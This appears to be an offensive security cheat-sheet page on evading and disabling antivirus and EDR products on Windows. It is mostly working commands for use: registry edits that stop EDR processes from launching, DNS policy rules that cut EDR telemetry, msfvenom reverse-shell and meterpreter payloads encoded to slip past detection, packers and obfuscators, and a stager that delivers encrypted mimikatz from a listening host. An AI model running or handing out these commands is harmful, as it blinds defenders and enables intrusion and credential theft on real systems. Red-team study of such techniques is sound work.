AV / EDR Evasion

Toy EDRs

Recon

Search for active AV processes on hosts (local admin priveleges required):

Cmd > WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "MsMpEng.exe"} | select ProcessName,PSComputerName}

Identify Microsoft.NET version from inspecting assembly properties:

PS > cd C:\Windows\Microsoft.NET\Framework64\
PS > ls
PS > cd .\v4.0.30319\
PS > Get-Item .\clr.dll | Fl
Or
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion

Identify Microsoft.NET version from querying the registry:

PS > Get-ItemProperty "HKLM:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -Name Release

Windows build <-> default .NET Framework version associations:

Windows Build

Default .NET Framework Version

1511

4.6.1

1607

4.6.2

1703

4.7

1709

4.7.1

1803

4.7.2

1909+

4.8

.NET Framework version <-> CLR version associations:

.NET Framework Version

CLR Version

2.0, 3.0, 3.5

4, 4.5-4.8

Note that we don't have to target the exact .NET Framework version when compiling our tools. It's enough to match the above relationship between .NET Framework version and CLR version, i. e. all 4.x versions will execute on CLR v4. For example, Rubeus compiled to target v4.5 will run on a machine with only .NET v4.0 installed.

Potential scan exclusions:

C:\Windows\System32\LogFiles\
C:\Windows\System32\inetsrv\
C:\Windows\ClusterStorage\
C:\ProgramData\Microsoft\Windows\Hyper-V\

Attacking EDRs

Hard-style launch prevention using IFEO:

Cmd > reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<EDR_IMAGE.exe>" /t REG_SZ /v Debugger /d "C:\Windows\System32\rundll32.exe" /f

Hard-style launch prevention using BootExecute:

Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "BootExecute" /t REG_MULTI_SZ /d "autocheck autochk *\0BEB" /f
Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "BootExecuteNoPnpSync" /t REG_MULTI_SZ /d "BEB" /f
Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "SetupExecute" /t REG_MULTI_SZ /d "BEB" /f
Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "PlatformExecute" /t REG_MULTI_SZ /d "BEB" /f

Hard-style launch prevention using PPL process start:

WFP-Based Prisons

https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/

EDRSilencer

https://github.com/netero1010/EDRSilencer/tree/main

EDRPrison

WinDivert

.NET:

Python:

ARP Spoofing + Scapy

Name Resolution Policy Table

https://cloudbrothers.info/en/edr-silencers-exploring-methods-block-edr-communication-part-1/

Add rule:

PS > Add-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" -NameServers 127.0.0.1 -Comment "MegaCorp EDR Web Panel"
PS > Clear-DnsClientCache -Confirm:$false

Remove rule:

PS > Get-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" | Remove-DnsClientNrptRule -PassThru -Confirm:$false -Force

EDR Blindspots

Bring Your Own Interpreter (BYOI)

https://synzack.github.io/Bring-Your-Own-Interpreter/

Python

Pyramid

BOFs with Python

Python RDI

Backdoor Electron Applications (JavaScript)

PE Obfuscation

https://blog.es3n1n.eu/posts/obfuscator-pt-1

OLLVM

Install LLVM 13.x obfuscator based on heroims/obfuscator and tpoechtrager/wclang:

apk update
apk add --no-cache build-base cmake git python3 mingw-w64-gcc
rm -rf /var/cache/apk/*
git clone --depth=1 -b llvm-13.x --single-branch https://github.com/heroims/obfuscator /opt/ollvm
cd /opt/ollvm
wget https://github.com/llvm/llvm-project/commit/ff1681ddb303223973653f7f5f3f3435b48a1983.patch
patch llvm/include/llvm/Support/Signals.h < ff1681ddb303223973653f7f5f3f3435b48a1983.patch
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../llvm
sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt
sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=`realpath ../clang`|g" CMakeCache.txt
make -j7
make install
git clone --depth=1 https://github.com/tpoechtrager/wclang /opt/wclang
cd /opt/wclang
cmake .
make -j7
make install
rm -rf /opt/ollvm /opt/wclang && mkdir /build

TinyCC

PS > curl https://download.savannah.gnu.org/releases/tinycc/tcc-0.9.27-win64-bin.zip -o tcc.zip
PS > Expand-Archive .\tcc.zip -DestinationPath .
PS > rm tcc.zip; cd tcc
PS > curl https://github.com/DosX-dev/obfus.h/raw/refs/heads/main/include/obfus.h -o obfus.h
PS > curl https://download.savannah.gnu.org/releases/tinycc/winapi-full-for-0.9.27.zip -o tcc-winapi.zip
PS > Expand-Archive .\tcc-winapi.zip -DestinationPath .
PS > rm tcc-winapi.zip
PS > Copy-Item -Path .\winapi-full-for-0.9.27\include\* -Destination .\include\ -Recurse -Force
PS > .\tcc.exe -w -DVIRT -DCFLOW_V2 -DANTIDEBUG_V2 -o msgbox.exe msgbox.c -luser32

String Encryption

Tools

Shellcode Mutation

https://g3tsyst3m.com/shellcode/pic/Let's-Create-Some-Polymorphic-PIC-Shellcode!/

Tools

PowerShell Tactics

PowerShell Obfuscation

Invoke-Obfuscation

Out-EncryptedScript.ps1

PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1
PS > . .\evil.ps1
PS > $dec = de "Passw0rd!" s4lt
PS > Invoke-Expression $dec

PowerShellArmoury

PS > git clone https://github.com/cfalta/PowerShellArmoury
PS > cd PowerShellArmoury
PS > curl https://github.com/snovvcrash/WeaponizeKali.sh/raw/main/conf/PSArmoury.json -o PSArmoury.json
PS > . .\New-PSArmoury.ps1
PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json
PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json
PS > cat -raw .\armored.ps1 | iex

Tools

msfvenom

$ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe

Veil-Evasion

Hyperion + Pescramble

$ wine hyperion.exe input.exe output.exe
$ wine PEScrambler.exe -i input.exe -o output.exe

GreatSCT

https://github.com/GreatSCT/GreatSCT

Install and generate a payload:

$ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT
$ cd ~/tools/GreatSCT/setup
$ ./setup.sh
$ cd .. && ./GreatSCT.py
...generate a payload...
$ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml}

$ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

Exec with msbuild.exe and get a shell:

PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml

Ebowla

$ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla
$ sudo apt install golang mingw-w64 wine python-dev -y
$ sudo python -m pip install configobj pyparsing pycrypto pyinstaller
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe
$ vi genetic.config
... Edit output_type, payload_type, clean_output, [[ENV_VAR]] ...
$ python ebowla.py rev.exe genetic.config && rm rev.exe
$ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go
[+] output/ebowla-rev.exe

PEzor

https://github.com/phra/PEzor

Wrap executable into PEzor:

$ bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2

inceptor

ScareCrow

charlotte

$ sudo apt install 'mingw-w64*' -y
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw > beacon.bin
$ python charlotte.py
Cmd > rundll32.exe charlotte.dll, <XOR_KEY>

MeterPwrShell

$ sudo ./MeterPwrShell2Kalix64 -c noaptupdate

stager_libpeconv

$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv
$ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4
$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
Cmd > dist\stager.exe

Last updated 2 months ago

hashtagToy EDRs

hashtagRecon

hashtagAttacking EDRs

hashtagWFP-Based Prisons

hashtagEDRSilencer

hashtagEDRPrison

hashtagWinDivert

hashtagARP Spoofing + Scapy

hashtagName Resolution Policy Table

hashtagEDR Blindspots

hashtagBring Your Own Interpreter (BYOI)

hashtagPython

hashtagBackdoor Electron Applications (JavaScript)

hashtagPE Obfuscation

hashtagOLLVM

hashtagTinyCC

hashtagString Encryption

hashtagTools

hashtagShellcode Mutation

hashtagTools

hashtagPowerShell Tactics

hashtagPowerShell Obfuscation

hashtagInvoke-Obfuscation

hashtagOut-EncryptedScript.ps1

hashtagPowerShellArmoury

hashtagTools

hashtagmsfvenom

hashtagVeil-Evasion

hashtagGreatSCT

hashtagEbowla

hashtagPEzor

hashtaginceptor

hashtagScareCrow

hashtagcharlotte

hashtagMeterPwrShell

hashtagstager_libpeconv

Toy EDRs

Recon

Attacking EDRs

WFP-Based Prisons

EDRSilencer

EDRPrison

WinDivert

ARP Spoofing + Scapy

Name Resolution Policy Table

EDR Blindspots

Bring Your Own Interpreter (BYOI)

Python

Backdoor Electron Applications (JavaScript)

PE Obfuscation

OLLVM

TinyCC

String Encryption

Tools

Shellcode Mutation

Tools

PowerShell Tactics

PowerShell Obfuscation

Invoke-Obfuscation

Out-EncryptedScript.ps1

PowerShellArmoury

Tools

msfvenom

Veil-Evasion

GreatSCT

Ebowla

PEzor

inceptor

ScareCrow

charlotte

MeterPwrShell

stager_libpeconv